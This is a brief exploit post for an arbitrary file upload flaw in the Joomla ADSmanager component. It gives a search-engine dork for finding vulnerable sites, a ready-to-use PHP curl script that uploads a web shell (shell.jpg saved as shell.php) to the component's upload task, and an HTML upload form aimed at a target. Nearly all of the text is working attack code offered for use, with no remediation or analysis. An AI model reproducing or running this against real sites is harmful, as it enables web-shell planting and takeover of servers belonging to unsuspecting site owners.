Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability

Joomla ADSmanager Exploit Arbitrary File Upload Vulnerabilit

Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org

CODE PHP :

<?php

$url = “blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component”; // put URL Here

$post = array

(

“file” => “@shell.jpg”,

“name” => “shell.php”

);

$ch = curl_init (“$url“);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);

curl_setopt ($ch, CURLOPT_USERAGENT, “Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0″);

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);

curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);

curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);

curl_setopt ($ch, CURLOPT_POST, 1);

@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);

$data = curl_exec ($ch);

curl_close ($ch);

echo $data;

?>

#CSRF :

<form method=”POST” action=”TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component”

enctype=”multipart/form-data”>

<input type=”file” name=”files[]” /><button>Upload</button>

</form>